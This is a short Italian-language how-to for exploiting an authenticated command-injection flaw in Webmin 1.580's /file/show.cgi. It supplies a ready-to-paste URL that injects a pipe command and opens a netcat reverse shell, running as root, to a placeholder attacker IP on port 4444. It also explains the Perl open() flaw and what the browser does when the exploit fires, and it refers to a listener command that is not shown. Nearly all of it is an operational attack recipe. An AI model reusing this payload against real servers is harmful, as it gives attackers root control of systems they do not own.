Guida all'esecuzione RCE su Webmin 1.580
Riferimento rapido per eseguire un Remote Code Execution (RCE) autenticato su Webmin 1.580 tramite il componente /file/show.cgi.
1. Macchina attaccante (Listener)
Esegui questo comando sulla tua macchina locale per catturare la connessione in arrivo prima di eseguire il payload:
- Payload di sfruttamento del target
Incolla il seguente URL direttamente nella barra degli indirizzi del browser (assicurati di aver effettuato l'accesso alla dashboard di Webmin prima):
http://127.0.0.1:10001/file/show.cgi/bin/sysinfo.cgi|rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR_ATTACK_IP> 4444 >/tmp/f|
Nota: Ricorda di sostituire <YOUR_ATTACK_IP> con il tuo indirizzo IP locale o tunnel effettivo, ANCHE IP e PORTA del target.

Contesto e Dettagli
- Vulnerabilità: Sanitizzazione insufficiente delle informazioni sul percorso inline passate alla funzione interna open() di Perl in /file/show.cgi. L'aggiunta del carattere pipe (|) consente l'esecuzione arbitraria di comandi con privilegi di root.
- Autenticazione: Richiede una sessione attiva. Il browser gestisce automaticamente l'autenticazione inviando i cookie della sessione attiva quando invii il payload dell'URL.
- Comportamento previsto: Dopo aver premuto Invio, la scheda del browser girerà e sembrerà bloccarsi indefinitamente. Ciò conferma che il thread del server è stato dirottato con successo per mantenere la sessione interattiva della shell.